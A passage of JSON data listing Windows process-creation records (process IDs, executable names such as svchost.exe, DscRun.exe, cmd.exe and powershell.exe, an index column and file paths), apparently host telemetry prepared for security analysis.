2100\",\"PID: 6084\",\"PID: 2188\",\"PID: 740\",\"PID: 4236\",\"PID: 4960\",\"PID: 6644\",\"PID: 6640\",\"PID: 5488\",\"PID: 6056\",\"PID: 4184\",\"PID: 2092\",\"PID: 3396\",\"PID: 7164\",\"PID: 6552\",\"PID: 7184\",\"PID: 4484\",\"PID: 3180\",\"PID: 1108\",\"PID: 1628\",\"PID: 3612\",\"PID: 4208\",\"PID: 7400\",\"PID: 2832\",\"PID: 8800\",\"PID: 7252\",\"PID: 6172\",\"PID: 2240\",\"PID: 8032\",\"PID: 4668\",\"PID: 1304\",\"PID: 3224\",\"PID: 7388\",\"PID: 5252\",\"PID: 2836\",\"PID: 5820\",\"PID: 7092\",\"PID: 7140\",\"PID: 3780\",\"PID: 3432\",\"PID: 2916\",\"PID: 7860\",\"PID: 3224\",\"PID: 1784\",\"PID: 2124\",\"PID: 7532\",\"PID: 1168\",\"PID: 5844\",\"PID: 2604\",\"PID: 1628\",\"PID: 4860\",\"PID: 3448\",\"PID: 8732\",\"PID: 4664\",\"PID: 5508\",\"PID: 1992\",\"PID: 5152\",\"PID: 8420\",\"PID: 2476\",\"PID: 4216\",\"PID: 7848\",\"PID: 6724\",\"PID: 5560\",\"PID: 7592\",\"PID: 2460\",\"PID: 2420\",\"PID: 8832\",\"PID: 8284\",\"PID: 4960\",\"PID: 4564\",\"PID: 2796\",\"PID: 7364\",\"PID: 8716\",\"PID: 3092\",\"PID: 7972\",\"PID: 7028\",\"PID: 5664\"],\"__proc_name$$\":[\"svchost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"dllhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MonitoringHost.exe\",\"unlodctr.exe\",\"conhost.exe\",\"csc.exe\",\"conhost.exe\",\"cvtres.exe\",\"lodctr.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WerFault.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"MOFWriter.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"SecEdit.exe\",\"SecEdit.exe\",\"DscRun.exe\",\"conhost.exe\",\"Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"suchost.exe\",\"powershell.exe\",\"powershell.exe\",\"cmd.exe\",\"GoogleUpdate.exe\",\"SpeechModelDownload.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"AppHostRegistrationVerifier.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"CompatTelRunner.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wsqmcons.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"wermgr.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"wermgr.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"taskhostw.exe\",\"GoogleUpdate.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"services.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"svchost.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"MonitoringHost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"WaAppAgent.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"MsMpEng.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"mpam-d3ea18d4.exe\",\"MpSigStub.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"svchost.exe\",\"WMIADAP.exe\",\"wermgr.exe\",\"wuauclt.exe\",\"AM_Delta.exe\",\"MpSigStub.exe\",\"wermgr.exe\"],\"index\":[1010,1009,1008,1007,1006,1005,1004,1003,1002,1001,1000,999,998,997,996,995,994,993,992,991,990,989,988,987,986,985,984,983,982,981,980,979,978,977,976,975,974,973,972,971,970,969,968,967,966,965,964,963,962,961,960,959,958,957,956,955,954,953,952,951,950,949,948,947,946,945,944,943,942,941,940,939,938,937,936,935,934,933,932,931,930,929,928,927,926,925,924,923,922,921,920,919,918,917,916,915,914,913,912,911,910,909,908,907,906,905,904,903,902,901,900,899,898,897,896,895,894,893,892,891,890,889,888,887,886,885,884,883,882,881,880,879,878,877,876,875,874,873,872,871,870,869,868,867,866,865,864,863,862,861,860,859,858,857,856,855,854,853,852,851,850,849,848,847,846,845,844,843,842,841,840,839,838,837,836,835,834,833,832,831,830,829,828,827,826,825,824,823,822,821,820,819,818,817,816,815,814,813,812,811,810,809,808,807,806,805,804,803,802,801,800,799,798,797,796,795,794,793,792,791,790,789,788,787,786,785,784,783,782,781,780,779,778,777,776,775,774,773,772,771,770,769,768,767,766,765,764,763,762,761,760,759,758,757,756,755,754,753,752,751,750,749,748,747,746,745,744,743,742,741,740,739,738,737,736,735,734,733,732,731,730,729,728,727,726,725,724,723,722,721,720,719,718,717,716,715,714,713,712,711,710,709,708,707,706,705,704,703,702,701,700,699,698,697,696,695,694,693,692,691,690,689,688,687,686,685,684,683,682,681,680,679,678,677,676,675,674,673,672,671,670,669,668,667,666,665,664,663,662,661,660,659,658,657,656,655,654,653,652,651,650,649,648,647,646,645,644,643,642,641,640,639,638,637,636,635,634,633,632,631,630,629,628,627,626,625,624,623,622,621,620,619,618,617,616,615,614,613,612,611,610,609,608,607,606,605,604,603,602,601,600,599,598,597,596,595,594,593,592,591,590,589,588,587,586,585,584,583,582,581,580,579,578,577,576,575,574,573,572,571,570,569,568,567,566,565,564,563,562,561,560,559,558,557,556,555,554,553,552,551,550,549,548,547,546,545,544,543,542,541,540,539,538,537,536,535,534,533,532,531,530,529,528,527,526,525,524,523,522,521,520,519,518,517,516,515,514,513,512,511,510,509,508,507,506,505,504,503,502,501,500,499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\dllhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 